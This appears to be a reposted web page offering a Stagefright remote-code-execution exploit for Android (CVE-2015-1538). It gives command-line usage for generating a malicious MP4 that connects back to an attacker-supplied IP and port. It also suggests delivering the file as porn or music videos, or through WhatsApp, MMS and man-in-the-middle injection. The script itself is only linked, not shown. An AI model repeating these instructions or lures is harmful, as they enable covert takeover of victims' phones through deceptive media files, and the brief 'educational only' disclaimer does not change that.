Android-exploit  - Stagefright v2 Android exploit.

Android-exploit – Stagefright v2 Android exploit.

DISCLAIMER: This exploit is for testing and educational purposes only. Any other usage for this code is not allowed. Use at your own risk.

Exploit for RCE Vulnerability CVE-2015-1538. Integer Overflow in the libstagefright MP4 ‘stsc’ atom handling.file_mp4
Don’t forget, the output of “create_mp4” can be delivered with many ways: likes; Packet Injection, MiTM method using Music Videos, Porn Videos, Blackberry Message, WhatsApp & MMS, MMS is the most dangerous attack vector, but not the only one.

usage:
– Rename Stagefright.py to mp4.py
– python mp4.py -h (to print help)
– example : python mp4.py -c 192.162.1.2 -p 445 -o honeymoon.mp4

 Stagefright Android exploit V-2

Stagefright Android exploit V-2

stagefright_2.py Script:

Source : https://github.com/jaythaceo